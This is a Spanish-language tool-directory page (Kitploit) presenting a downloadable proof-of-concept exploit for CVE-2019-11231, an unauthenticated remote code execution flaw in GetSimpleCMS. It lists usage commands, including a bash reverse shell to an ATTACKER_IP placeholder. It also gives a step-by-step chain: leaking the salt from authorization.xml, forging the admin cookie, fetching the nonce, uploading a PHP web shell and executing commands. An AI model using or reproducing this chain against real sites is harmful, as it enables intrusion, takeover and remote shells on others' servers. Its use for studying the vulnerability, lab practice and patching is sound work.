Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Herramientas/GitHubGitHub/akincibor/cve-2019-11231-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de GetSimpleCMS CVE-2019-11231

Python CVE

Exploit de ejecución remota de código no autenticado para GetSimpleCMS ≤ 3.3.15

Vulnerabilidad

GetSimpleCMS expone archivos sensibles públicamente (/data/other/authorization.xml, /data/users/), lo que permite a los atacantes:

  1. Filtrar claves de API y nombres de usuario
  2. Forjar cookies de autenticación
  3. Obtener tokens CSRF
  4. Subir y ejecutar código PHP arbitrario

Puntuación CVSS: 9.8 (Crítico)

Uso

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Cómo funciona

  1. Enumerar versión → GET /admin/
  2. Filtrar salt → GET /data/other/authorization.xml
  3. Obtener nombre de usuario → GET /data/users/
  4. Forjar cookie → SHA1(username + salt)
  5. Obtener nonce → GET /admin/theme-edit.php
  6. Subir shell → POST /admin/theme-edit.php
  7. Ejecutar comandos → GET /theme/shell.php?cmd=...

Archivos

  • exploit.py - Script principal del exploit
  • requirements.txt - Dependencias (requests, beautifulsoup4)

Descargo de responsabilidad

⚠️ Solo con fines educativos. Pruebe únicamente en sistemas que le pertenezcan o para los que tenga permiso de prueba.

Referencias

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Descargar herramienta